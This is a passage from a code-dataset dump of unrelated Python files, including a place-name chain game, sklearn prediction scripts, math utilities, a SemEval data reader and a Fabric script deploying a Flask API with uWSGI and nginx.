q_name:\r\n\tqu.append(i[:-1])\r\nqu.remove('国地名')\r\nqu.remove('各省市')\r\nqu.remove('个市辖')\r\nqu.remove('族自治')\r\nqu.remove('省行政')\r\nqu.remove('省市县')\r\nqu.remove('个地')\r\nqu.remove('尔自治')\r\nqu.remove('别行政')\r\nqu.remove('藏自治')\r\nqu.remove('古自治')\r\nqu.remove('万山特')\r\nqu.remove('六枝特')\r\n\r\nqu.append('香港')\r\nqu.append('西藏')\r\nqu.append('澳门')\r\nqu.append('新疆')\r\nqu.append('宁夏')\r\nqu.append('广西')\r\n\r\nall_name = list(set(shi+xian+qu))\r\nall_name = np.reshape(all_name,-1)\r\n\r\nall_pinyin = py.pinyin(all_name)\r\nall_pinyin = np.reshape(all_pinyin,-1)\r\n\r\nword_length = []\r\nfor i in all_name:\r\n word_length.append(len(i))\r\nword_length = np.array(word_length)\r\n\r\ncount = 0\r\nend_position = []\r\nfor i in word_length:\r\n count+=i\r\n end_position.append(count)\r\nend_position = np.array(end_position)\r\n\r\nfront_position = [m - n + 1 for m,n in zip(end_position,word_length)] \r\nfront_position = np.array(front_position)\r\n\r\nfront_pinyin = []\r\nfor i in front_position:\r\n front_pinyin.append(all_pinyin[i - 1])\r\nfront_pinyin = np.reshape(front_pinyin,-1)\r\n\r\n\r\nend_pinyin = []\r\nfor i in end_position:\r\n end_pinyin.append(all_pinyin[i - 1])\r\nend_pinyin = np.reshape(end_pinyin,-1)\r\n\r\n\r\ndf = pd.DataFrame(all_name,np.arange(len(all_name)))\r\n\r\ndf[1] = front_pinyin\r\ndf[2] = end_pinyin\r\ndf.columns = [\"地名\",\"头拼音\",\"尾拼音\"]\r\n\r\nplace_list = df['地名'].tolist()\r\nhead_pinyin_list = df['头拼音'].tolist()\r\nend_pinyin_list = df['尾拼音'].tolist()\r\n\r\n\r\nget_name = input(\"请输入地名(比如北京):\")\r\nwhile get_name:\r\n if get_name == 'QUIT':\r\n exit()\r\n else:\r\n if get_name in place_list:\r\n print(\"存在这个地名\\n\")\r\n if end_pinyin_list[place_list.index(get_name)] in head_pinyin_list:\r\n print('并且存在后继地名,后继城市有如下:\\n')\r\n place_count = 0\r\n for i in place_list:\r\n if end_pinyin_list[place_list.index(get_name)] == head_pinyin_list[place_list.index(i)]:\r\n place_count+=1\r\n print(place_count,i)\r\n print('选择一个地名来继续地名接龙,输入其中一个可能的地名:')\r\n get_name = input('哪一个地名你选择?退出请输入QUIT。')\r\n else:\r\n print('但是不存在后继地名,请换一个地名重新开始。')\r\n get_name = input()\r\n else:\r\n print(\"不存在这个地名\")\r\n print('但是不存在后继地名,请换一个地名重新开始。')\r\n get_name = 
input()\r\n\r\n","sub_path":"names_in_chain.py","file_name":"names_in_chain.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"149938408","text":"#\n# Build URIs.\n#\n# Author: Max Kellermann \n#\n\nfrom urllib.parse import quote\n\ndef absolute_uri(request, scheme=None, host=None, uri=None, query_string=None,\n param=None):\n \"\"\"Returns the absolute URI of this request. You may override\n some of the attributes.\"\"\"\n\n if scheme is None: scheme = \"http\"\n if host is None:\n host = request.host\n if host is None: host = \"localhost\"\n if uri is None:\n uri = request.raw_uri\n if uri is None: uri = \"/\"\n x = scheme + \"://\" + host + uri\n if request.args is not None:\n x += \";\" + request.args\n\n if param is not None:\n if request.args is not None:\n x += \"&\"\n else:\n x += \";\"\n x += \"translate=\" + quote(param)\n\n if query_string is None:\n query_string = request.query_string\n if query_string is not None:\n x += \"?\" + query_string\n return x\n","sub_path":"python/beng_proxy/translation/uri.py","file_name":"uri.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"463393310","text":"from __future__ import division\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.semi_supervised import LabelSpreading\r\nfrom sklearn.linear_model import Perceptron\r\nimport argparse\r\n\r\n\r\n \r\n# Load your classification data here\r\nX = []\r\nXtest=[]\r\ny = []\r\nparser=argparse.ArgumentParser()\r\nparser.add_argument(\"sampleTestFeatureFile\", type=str)\r\nparser.add_argument(\"sampleTrainingFeatureFile\", type=str)\r\nparser.add_argument(\"sampleTrainingOutcomeFile\", type=str)\r\nparser.add_argument(\"logitOutputFile\", type=str)\r\nparser.add_argument(\"semiSupOutputFile\", type=str)\r\nparser.add_argument(\"neuroNetOutputFile\", type=str)\r\nargs = parser.parse_args()\r\n\r\nfx=open(args.sampleTrainingFeatureFile,'r')\r\nfor line in fx:\r\n #X.append(line.strip().split(','))\r\n a=[]\r\n a.append(line.strip().split('\\t'))\r\n i=0;\r\n while i<16:\r\n X.append(float(a[0][i]))\r\n i=i+1\r\n \r\n #X.append(tuple(float(a[0][0]),float(a[0][1])??not work\r\n\r\nX=np.asarray(X)\r\nXLength=len(X)\r\n\r\nX=X.reshape(XLength//16,16)\r\nfxt=open(args.sampleTestFeatureFile,'r')\r\nfor line in fxt:\r\n #X.append(line.strip().split(','))\r\n a=[]\r\n a.append(line.strip().split('\\t'))\r\n i=0;\r\n while i<16:\r\n Xtest.append(float(a[0][i]))\r\n i=i+1\r\n \r\n #X.append(tuple(float(a[0][0]),float(a[0][1])??not work\r\n\r\nXtest=np.asarray(Xtest)\r\nXtestLength=len(Xtest)\r\n\r\nXtest=Xtest.reshape(XtestLength//16,16)\r\n \r\n \r\n\r\nfy=open(args.sampleTrainingOutcomeFile,'r')\r\nfor line in fy:\r\n\ty.append(float(line))\r\n \r\ny=np.asarray(y)\r\n\r\n#logistic regression\r\nlog_reg = LogisticRegression(C=10**10)\r\nlog_reg.fit(X, y)\r\ny_hat = log_reg.predict(Xtest)\r\nout = open(args.logitOutputFile,'w')\r\nout.write(','.join(map(str,y_hat)))\r\nout.close()\r\n#semi-supervised learning LabelSpreading\r\n#choose K = 5 alpha= 0.8 \r\nclf = LabelSpreading(kernel='knn',n_neighbors=3,alpha=0.99999,n_jobs=15)\r\nXin=np.concatenate((X,Xtest),axis=0)\r\nlenXt=len(Xtest)\r\nlabels=np.empty(lenXt)\r\nlabels.fill(-1)\r\nyin=np.concatenate((y,labels),axis=0)\r\nclf.fit(Xin,yin)\r\ny_hat = clf.predict(Xtest)\r\nout = 
open(args.semiSupOutputFile,'w')\r\nout.write(','.join(map(str,y_hat)))\r\nout.close()\r\n\r\n#neuroNet work perceptron\r\n#choose n_iter = 60 \r\nclf = Perceptron(n_iter=5,random_state=0,n_jobs=20)\r\nclf.fit(X,y)\r\ny_hat = clf.predict(Xtest)\r\nout = open(args.neuroNetOutputFile,'w')\r\nout.write(','.join(map(str,y_hat)))\r\nout.close()\r\n","sub_path":"bin/predict2.py","file_name":"predict2.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"110194740","text":"# @Time : 2019/4/7 15:23\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nfrom typing import Tuple\n\n\ndef calculate(s: str) -> int:\n def get_digits(i: int, step: int) -> Tuple[int, int]:\n e = i + step\n while e < len(s) and s[e].isdigit():\n e += 1\n return int(s[i + step - 1:e]), e\n\n stack = ['+']\n i = 0\n # 去掉空格\n s = ''.join([elem for elem in s if elem != ' '])\n while i < len(s):\n if s[i] == '*':\n num1 = int(stack.pop())\n num2, i = get_digits(i, 2)\n stack.append(num1 * num2)\n elif s[i] == '/':\n dividend = int(stack.pop())\n divisor, i = get_digits(i, 2)\n stack.append(dividend // divisor)\n elif s[i].isdigit():\n digits, i = get_digits(i, 1)\n stack.append(digits)\n else:\n stack.append(s[i])\n i += 1\n ret = j = 0\n while j < len(stack):\n if stack[j] == '+':\n ret += int(stack[j + 1])\n elif stack[j] == '-':\n ret -= int(stack[j + 1])\n j += 2\n return ret\n\n\ndef calculate1(s: str) -> int:\n # 为了将最后一部分计算完成\n s += '+0'\n stack, num, preOp = [], 0, \"+\"\n for i in range(len(s)):\n if s[i].isdigit():\n num = num * 10 + int(s[i])\n elif not s[i].isspace():\n if preOp == \"-\":\n stack.append(-num)\n elif preOp == \"+\":\n stack.append(num)\n elif preOp == \"*\":\n stack.append(stack.pop() * num)\n else:\n stack.append(stack.pop() // num)\n preOp, num = s[i], 0\n return sum(stack)\n\n\nif __name__ == \"__main__\":\n s = \" 100*2 + 1 / 1 * 12 / 7\"\n print(calculate1(s))\n","sub_path":"calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"71401505","text":"# Utilities file for stuff like:\n# Finding Primes up to n\n# Getting all factors of n\n\nimport numpy as np\nimport random\nimport math\n\n# Get all primes up to n, inclusive\ndef getPrimeArr(n):\n\n # Sieve of Eratosthenes\n numArr =[2,3]\n for num in range(5, n+1, 2):\n numArr.append(num)\n print(\"Sieve generated.\")\n # Ticker\n sieveSize = len(numArr)\n print(\"Sieve size :\"),\n print(sieveSize)\n\n # Generate the non-primes\n index = 1\n num = numArr[index]\n while num != numArr[-1]:\n\n # Ticker\n if len(numArr) < sieveSize // 2:\n sieveSize = len(numArr)\n print(\"Sieve has been reduced by half to\"),\n print(sieveSize)\n\n for j in range(num**2, n+1, num * 2):\n if j in numArr:\n numArr.remove(j)\n index += 1\n num = numArr[index]\n\n print(len(numArr)),\n print(\"primes generated.\")\n return numArr\n\n# Update a prime array up to n, inclusive\ndef updatePrimeArr(n, primeArr):\n for x in xrange(primeArr[-1], n+1):\n for prime in primeArr:\n if x % prime == 0:\n break\n elif prime == primeArr[-1] and\\\n x % prime != 0:\n primeArr.append(x)\n\n return primeArr\n\n# Get all divisors of n (non-prime)\ndef getDivs(n):\n\n maxF = n # Maximum factor, stopping condition\n output = [1,n]\n\n for x in xrange(2, n // 2):\n if x + 1 == maxF:\n break\n if n % x == 0:\n output.append(x)\n output.append(n / x)\n\n maxF = 
n / x\n\n output = sorted(list(set(output)))\n return output\n\n# Return a list of permutations of a list\ndef permute(arr):\n # Recursive? Recursive.\n # Base case\n if len(arr) <= 1:\n return [arr]\n\n perms = []\n for elem in arr:\n reducedArr = list(arr)\n reducedArr.remove(elem)\n\n for perm in permute(reducedArr):\n perms.append([str(elem)] + perm)\n\n return perms\n\n# Get all prime factors.\ndef getPrimeFactors(n, primeArr=None):\n # Takes prime array to reduce compute.\n if primeArr is None:\n primeArr = getPrimeArr(n)\n\n if n in primeArr:\n return [n]\n\n index = 0\n output = []\n while primeArr[index] <= n:\n if n % primeArr[index] == 0:\n output.append(primeArr[index])\n n /= primeArr[index]\n else:\n index += 1\n return output\n\nif __name__ == \"__main__\":\n primeArr = getPrimeArr(25)\n print(\"Primes up to 25 : \"),\n print(primeArr)\n\n primeArr = updatePrimeArr(50, primeArr)\n print(\"Primes up to 25, updated to 50 : \"),\n print(primeArr)\n\n factors = getDivs(24)\n print(\"Factors of 24 : \"),\n print(factors)\n\n primefacs = getPrimeFactors(20)\n print(\"Primes factors of 20 : \"),\n print(primefacs)\n\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"39311922","text":"from Animals.Animal import Animal\nimport time\n#from manager.World import World\nclass Human(Animal):\n limitTarczaAlzura = 5\n def __init__(self , xx , yy , ref):\n self.wasMove = False\n self._tarczaAlzura = False\n self._roundsActivate = 0\n self._roundsDeactivate = Human.limitTarczaAlzura\n super(Human , self).__init__(5 , 4 , xx , yy , \"Czlowiek\" , ref)\n self._reference.getRoot().bind('', self.__onArrowUpPress)\n self._reference.getRoot().bind('', self.__onArrowDownPress)\n self._reference.getRoot().bind('', self.__onArrowRightPress)\n self._reference.getRoot().bind('', self.__onArrowLeftPress)\n self._reference.getRoot().bind('', self.__onKeyPress)\n def action(self):\n self._reference.drawComment(\"Ruch czlowieka\")\n if self._roundsActivate == 0:\n self._tarczaAlzura = False\n if self._tarczaAlzura == True:\n self._roundsActivate = self._roundsActivate - 1\n else:\n self._roundsDeactivate = self._roundsDeactivate + 1\n #osluga strzalek do czlowieka\n self.wasMove = False\n self._savePrevXY()\n time.sleep(2)\n def collision(self):\n if self._tarczaAlzura == True:\n self._reference.drawComment(\"Tarcza Alzura aktywna \" + str(Human.limitTarczaAlzura - self._roundsActivate) + \" rund pozostalo \" )\n self.doOnlyAction()\n else:\n return super(Human, self).collision()\n \n def __onArrowUpPress(self , event):\n if self._y - 1 >=0 and self.wasMove == False:\n self.wasMove = True\n self._y = self._y - 1\n self.__onArrowPress()\n \n def __onArrowDownPress(self , event):\n if self._y + 1 < self._reference.sizeWorld and self.wasMove == False:\n self.wasMove = True\n self._y = self._y + 1\n self.__onArrowPress()\n def __onArrowRightPress(self , event):\n if self._x + 1 < self._reference.sizeWorld and self.wasMove == False:\n self.wasMove = True\n self._x = self._x + 1\n self.__onArrowPress()\n def __onArrowLeftPress(self , event):\n if self._x - 1 >= 0 and self.wasMove == False:\n self.wasMove = True\n self._x = self._x - 1\n self.__onArrowPress()\n def __onArrowPress(self):\n self._reference.getDrawing().create_rectangle(self._reference.dimensionField*self._prevX, self._reference.dimensionField*self._prevY, self._reference.dimensionField*(self._prevX+1), 
self._reference.dimensionField*(self._prevY+1), fill=\"gray\" , outline=\"gray\")\n self.draw()\n self._reference.getDrawing().pack()\n def __onKeyPress(self , event):\n if event.char=='s' and self._tarczaAlzura == False and self._roundsDeactivate>=Human.limitTarczaAlzura:\n self._tarczaAlzura = True\n self._roundsActivate = Human.limitTarczaAlzura\n self._roundsDeactivate = 0\n self._reference.drawComment(\"Tarcza Alzura aktywowana\")\n\n def getWasMove(self):\n return self.wasMove\n def doOnlyAction(self): # wywowalnie z tarczy alzura\n self._reference.getDrawing.delete(\"all\")\n\n amount = len(self._reference.getOrganisms())\n for i in range(0 , amount):\n element = self._organisms[i]\n if self._x == self._reference.getOrganismX(i) and self._y == self._reference.getOrganismY(i):\n element.action()\n element.draw()\n self._drawing.pack()\n\n","sub_path":"sem2/python/wirtualWorld/Animals/Human.py","file_name":"Human.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"196913912","text":"import os\nimport csv\nimport numpy as np\n\nfrom tqdm import tqdm\n\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom xml.etree import ElementTree as ET\nfrom nltk import word_tokenize\n\nseed = 3535999445\n\n\n#\n# def _rocstories(path):\n# with open(path, encoding='utf_8') as f:\n# f = csv.reader(f)\n# st = []\n# ct1 = []\n# ct2 = []\n# y = []\n# for i, line in enumerate(tqdm(list(f), ncols=80, leave=False)):\n# if i > 0:\n# s = ' '.join(line[1:5])\n# c1 = line[5]\n# c2 = line[6]\n# st.append(s)\n# ct1.append(c1)\n# ct2.append(c2)\n# y.append(int(line[-1]) - 1)\n# return st, ct1, ct2, y\n#\n#\n# def rocstories(data_dir, n_train=1497, n_valid=374):\n# storys, comps1, comps2, ys = _rocstories(\n# os.path.join(data_dir, 'cloze_test_val__spring2016 - cloze_test_ALL_val.csv'))\n# teX1, teX2, teX3, _ = _rocstories(os.path.join(data_dir, 'cloze_test_test__spring2016 - cloze_test_ALL_test.csv'))\n# tr_storys, va_storys, tr_comps1, va_comps1, tr_comps2, va_comps2, tr_ys, va_ys = train_test_split(storys, comps1,\n# comps2, ys,\n# test_size=n_valid,\n# random_state=seed)\n# trX1, trX2, trX3 = [], [], []\n# trY = []\n# for s, c1, c2, y in zip(tr_storys, tr_comps1, tr_comps2, tr_ys):\n# trX1.append(s)\n# trX2.append(c1)\n# trX3.append(c2)\n# trY.append(y)\n#\n# vaX1, vaX2, vaX3 = [], [], []\n# vaY = []\n# for s, c1, c2, y in zip(va_storys, va_comps1, va_comps2, va_ys):\n# vaX1.append(s)\n# vaX2.append(c1)\n# vaX3.append(c2)\n# vaY.append(y)\n# trY = np.asarray(trY, dtype=np.int32)\n# vaY = np.asarray(vaY, dtype=np.int32)\n# return (trX1, trX2, trX3, trY), (vaX1, vaX2, vaX3, vaY), (teX1, teX2, teX3)\n\n\ndef _semeval(fname):\n '''\n read aspect term data from xml file\n :param fname:\n :param wordcounter:\n :param targetcounter:\n :return:\n '''\n print('reading aspect term from {}'.format(fname))\n dic = {'positive': 2, 'neutral': 1, 'negative': 0}\n tree = ET.parse(fname)\n root = tree.getroot()\n bad_sent = 0\n sent_list = []\n aspect_list = []\n label_list = []\n for sentence in tqdm(root.findall('sentence')):\n try:\n txt = sentence.find('text').text.lower().rstrip()\n words = word_tokenize(txt)\n aspects = sentence.find('aspectTerms')\n for aspect in aspects.findall('aspectTerm'):\n a = aspect.get('term').lower().strip()\n # if '/' in a:\n # a = a.split('/')[-1]\n p = aspect.get('polarity')\n if p == 'conflict':\n continue\n p = dic[p]\n sent_list.append(txt)\n 
aspect_list.append(a)\n label_list.append(p)\n except:\n bad_sent += 1\n print('bad sent %d, total count %d' % (bad_sent, len(sent_list)))\n return sent_list, aspect_list, label_list\n\n\ndef semeval(data_dir):\n # sents, aspects, labels = _semeval(os.path.join(data_dir, 'Laptops_Train_v2.xml'))\n sents, aspects, labels = _semeval(os.path.join(data_dir, 'Restaurants_Train_v2.xml'))\n # va_sents, va_aspects, va_labels = _semeval(os.path.join(data_dir, 'Laptops_Test_Gold.xml'))\n va_sents, va_aspects, va_labels = _semeval(os.path.join(data_dir, 'Restaurants_Test_Gold.xml'))\n return (sents, aspects, labels), (va_sents, va_aspects, va_labels)\n","sub_path":"transformer_sep/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"304582829","text":"# coding: utf-8\n# Copyright (c) 2014 Valentin Novikov \n#\n# Tested on Ubuntu Server 14.04 (x64)\n\nimport os\nfrom fabric.api import *\n\nLOCAL_ROOT = os.path.dirname(__file__)\nLOCAL_TEMP_DIR = os.path.join(os.getenv('TMPDIR', LOCAL_ROOT), 'tmp')\n\nif not os.path.exists(LOCAL_TEMP_DIR):\n os.makedirs(LOCAL_TEMP_DIR)\n\nenv.roledefs['production-servers'] = [\n 'root@socgeos.com',\n]\n\nenv.roledefs['develop-servers'] = [\n 'user@api.server1.sg',\n]\n\n### Глобальные параметры\nOS_WWW_ROOT = '/var/www'\nOS_LOG_ROOT = '/var/log/socgeos'\nOS_UID = 'www-data'\nOS_GID = 'www-data'\nOS_GID_UID = '{}:{}'.format(OS_GID, OS_UID)\n\nSERVICE_PYENV_ROOT = '/opt/pyenv3'\nSERVICE_LOG_PATH = '/'.join([OS_LOG_ROOT, '%(service_name)s'])\n\nPYTHON_ROOT = '/opt/python-3.4.1'\nPYTHON_APP = '/'.join([PYTHON_ROOT, 'bin/python3.4'])\nPYTHON_PIP = '/'.join([PYTHON_ROOT, 'bin/pip3.4'])\n\n### Глобальные параметры uwsgi\n# путь до сокета\nUWSGI_SOCKET = '/tmp/%(service_name)s.sock'\n# главный скрипт для запуска\nUWSGI_FILE = '%(uwsgi_wsgi_file)s'\n# корневой каталог сервера\nUWSGI_CHDIR = '%(www_root)s'\n# корневой каталог python-окружения\nUWSGI_HOME_ENV = '%(pyenv_root_path)s'\nUWSGI_CALLABLE = 'app'\nUWSGI_MASTER = 'true'\nUWSGI_UID = OS_UID\nUWSGI_GID = OS_GID\nUWSGI_DIEONTERM = 'true'\nUWSGI_PROCESSES = '%(uwsgi_processes)s'\nUWSGI_THREADS = '%(uwsgi_threads)s'\nUWSGI_LOGGER = '%(uwsgi_logger)s'\n\n### Настройки сервера\nSERVICE_API_FLASK_NAME = 'socgeos_api'\nSERVICE_API_FLASK_LOG_ROOT = '/'.join([OS_LOG_ROOT, SERVICE_API_FLASK_NAME])\nenv.api_flask_server = dict(\n service_name=SERVICE_API_FLASK_NAME,\n # корневой каталог нашего сервера\n www_root='/'.join([OS_WWW_ROOT, SERVICE_API_FLASK_NAME]),\n www_root_chown=OS_GID_UID,\n # сервисы, которые будут перезапускатьс�� по требованию\n system_services=[SERVICE_API_FLASK_NAME, 'nginx'],\n #\n server_git_source='http://vnlannor@192.168.1.33/socgeos/socgeos_server.git',\n # файлы/папки нашего сервера, которые нужно скопировать в %(www_root)s\n server_source_files=['server', 'run_server.py', 'requirements.txt'],\n # python-окружение нашего сервера\n pyenv_root_path='/'.join([SERVICE_PYENV_ROOT, SERVICE_API_FLASK_NAME]),\n # глобальные зависимости python-окружения\n # (устанавливаются после создания окружения)\n pyenv_depends=' '.join(['uwsgi']),\n #\n uwsgi_out_ini_filename='/'.join(['/etc/socgeos', SERVICE_API_FLASK_NAME, 'uwsgi.ini']),\n uwsgi_socket=(UWSGI_SOCKET % {'service_name': SERVICE_API_FLASK_NAME}),\n uwsgi_wsgi_file='run_server.py',\n uwsgi_processes=4,\n uwsgi_threads=2,\n uwsgi_logger='/'.join(['file:'+SERVICE_API_FLASK_LOG_ROOT, 'uwsgi.log']),\n #\n 
nginx_site_available='/etc/nginx/sites-available/'+SERVICE_API_FLASK_NAME,\n nginx_site_enabled='/etc/nginx/sites-enabled/default',\n)\n\n\ndef server_services(env_name, status='restart'):\n \"\"\" Запускает/Перезапускает/Останов сервисы \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n if status not in ('start', 'stop', 'restart'):\n status = 'restart'\n\n for srv in my_env['system_services']:\n sudo('service {0} {1} ; true'.format(srv, status))\n\ndef install_python():\n \"\"\" Установка Python из исходного кода \"\"\"\n PYTHON_URL = 'https://www.python.org/ftp/python/3.4.1/Python-3.4.1.tgz'\n DEPENDS = ' '.join([\n 'build-essential', 'git-core',\n 'libbz2-dev', 'libreadline-dev', 'zlib1g-dev', 'libssl-dev',\n 'libsqlite3-dev', 'libncurses5-dev', 'liblzma-dev',\n ])\n\n # if run('[ -x %s ] && true' % PYTHON_APP).return_code == 0:\n # run('echo \"%s is exists\"' % PYTHON_APP)\n # return\n\n sudo(\"mkdir -p {0}; apt-get update -q && apt-get install -q -y {1}\".format(PYTHON_ROOT, DEPENDS))\n\n with cd('/tmp'):\n # TODO: Checksum MD5\n run('wget -c -T 30 %s -O - | tar -xz' % PYTHON_URL)\n\n with cd(os.path.basename(PYTHON_URL)[:-4]):\n run('./configure --prefix=%s && make' % PYTHON_ROOT)\n sudo('make install')\n\n\ndef install_pyenv(env_name):\n \"\"\" Устанавливает Python-virtualenv \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n sudo('[ -d %(pyenv_root_path)s ] && rm -rf %(pyenv_root_path)s ; true' % my_env)\n sudo(PYTHON_APP+' -m venv %(pyenv_root_path)s' % my_env)\n sudo('%(pyenv_root_path)s/bin/pip3 install --upgrade %(pyenv_depends)s' % my_env)\n\n\ndef generate_uwsgi_config(env_name):\n \"\"\" Генерирует UWSGI конфигрурация\n @env_name: название окружения с настройками настройками сервера\n \"\"\"\n\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n values = [\n ('socket', UWSGI_SOCKET),\n ('chdir', UWSGI_CHDIR),\n ('home', UWSGI_HOME_ENV),\n ('wsgi-file', UWSGI_FILE),\n ('callable', UWSGI_CALLABLE),\n ('master', UWSGI_MASTER),\n ('uid', UWSGI_UID),\n ('gid', UWSGI_GID),\n ('die-on-term', UWSGI_DIEONTERM),\n ('processes', UWSGI_PROCESSES),\n ('threads', UWSGI_THREADS),\n ('logger', UWSGI_LOGGER),\n ]\n\n import ConfigParser\n uwsgi_ini = ConfigParser.RawConfigParser()\n uwsgi_ini.add_section('uwsgi')\n\n for (key, value) in values:\n uwsgi_ini.set('uwsgi', key, value % my_env)\n\n outfile = os.path.join(LOCAL_TEMP_DIR, 'uwsgi.ini')\n with open(outfile, 'wb') as fout:\n uwsgi_ini.write(fout)\n return outfile\n\n\ndef install_uwsgi_config(env_name, outfile):\n \"\"\" Устанавливает конфигурацию uwsgi \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n outdir = os.path.dirname(my_env['uwsgi_out_ini_filename'])\n sudo('mkdir -pv {}'.format(outdir))\n\n put(outfile, '/tmp/uwsgi.ini')\n sudo('cp -fv /tmp/uwsgi.ini %(uwsgi_out_ini_filename)s' % my_env)\n\n\ndef generate_uwsgi_service_ubuntu(env_name):\n \"\"\" Генерирует файл для запуска и останова службы \"\"\"\n TEMPLATE = \"\"\"\\\nstart on [2345]\nstop on [06]\n\nscript\n cd %(www_root)s\n exec %(pyenv_root_path)s/bin/uwsgi --ini %(uwsgi_out_ini_filename)s\nend script\n\"\"\"\n\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n outfile = os.path.join(LOCAL_TEMP_DIR, '%(service_name)s.conf' % my_env)\n 
with open(outfile, 'wb') as fout:\n fout.write(TEMPLATE % my_env)\n return outfile\n\n\ndef install_uwsgi_service_ubuntu(env_name, outfile):\n \"\"\" Устанавливает сервис uwsgi \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n put(outfile, '/tmp/uwsgi.conf')\n sudo('cp -fv /tmp/uwsgi.conf /etc/init/%(service_name)s.conf' % my_env)\n\n\ndef generate_nginx_config(env_name, hostname):\n \"\"\" Генерирует файл конфигурации nginx \"\"\"\n\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n TEMPLATE = \"\"\"\\\nserver {\n server_name $hostname$;\n\n location / {\n include uwsgi_params;\n uwsgi_pass unix:%(uwsgi_socket)s;\n }\n}\"\"\".replace('$hostname$', hostname)\n\n outfile = os.path.join(LOCAL_TEMP_DIR, 'nginx.conf')\n with open(outfile, 'wb') as fout:\n fout.write(TEMPLATE % my_env)\n return outfile\n\n\ndef install_nginx():\n sudo('apt-get install -y nginx-full')\n\n\ndef install_nginx_config(env_name, outfile):\n \"\"\" Установка конфигурации nginx \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n put(outfile, '/tmp/nginx.conf')\n sudo('cp -fv /tmp/nginx.conf %(nginx_site_available)s' % my_env)\n if my_env['nginx_site_available'] == my_env['nginx_site_enabled']:\n sudo(('ln -sfv %(nginx_site_enabled)s %(nginx_site_enabled)s' % my_env)+\"-$(date +%d%m%y_%H%M%S)\")\n sudo('ln -sfv %(nginx_site_available)s %(nginx_site_enabled)s' % my_env)\n\n\ndef copy_server(env_name):\n \"\"\" Копирует файлы сервера на удаленный хост \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n sudo('mkdir -p %(www_root)s ; true' % my_env)\n run('[ -d /tmp/src ] && rm -rf /tmp/src ; true')\n run('git clone %(server_git_source)s /tmp/src' % my_env)\n sudo('rm -rf %(www_root)s' % my_env)\n\n with cd('/tmp/src'):\n for f in my_env['server_source_files']:\n out = os.path.join(my_env['www_root'], f)\n outdir = os.path.dirname(out)\n sudo('mkdir -p {}; true'.format(outdir))\n sudo('cp -rf {} {}'.format(f, out))\n\n sudo('chown -R %(www_root_chown)s %(www_root)s' % my_env)\n sudo('%(pyenv_root_path)s/bin/pip3 install --upgrade -r /tmp/src/requirements.txt' % my_env)\n\nupdate_server = copy_server\n\ndef archive_server():\n \"\"\" Архивирует сервер для последующей передачи \"\"\"\n files = ['logs', 'server', 'requirements.txt', 'run_server.py', 'test_server.py']\n outfile = os.path.join(LOCAL_TEMP_DIR, 'server.tgz')\n\n local('tar cfz {0} {1}'.format(outfile, ' '.join(files)))\n local('md5 {0} > {0}.md5'.format(outfile))\n\n return outfile\n\n\ndef extract_archive_to_server(env_name):\n \"\"\" Устанавливает архив сервера на указанные хосты \"\"\"\n my_env = env.get(env_name)\n\n if not my_env:\n raise ValueError('Unknown env_name={0!r}'.format(env_name))\n\n archive = archive_server()\n put(archive, '/tmp/archive.tgz')\n\n cmd = '[ -d %(www_root)s ] && mv %(www_root)s %(www_root)s' % my_env\n sudo(cmd + '_$(date +%d%m%y_%H%M%S) ; true')\n sudo('mkdir -p %(www_root)s ; true; tar xfz /tmp/archive.tgz -C %(www_root)s' % my_env)\n sudo('chown -R %(www_root_chown)s %(www_root)s' % my_env)\n server_services(env_name, 'restart')\n\n\ndef install_server(env_name='api_flask_server', hostname='localhost'):\n \"\"\" Производит полную установку сервера \"\"\"\n server_services(env_name, 'stop')\n install_python()\n install_pyenv(env_name)\n 
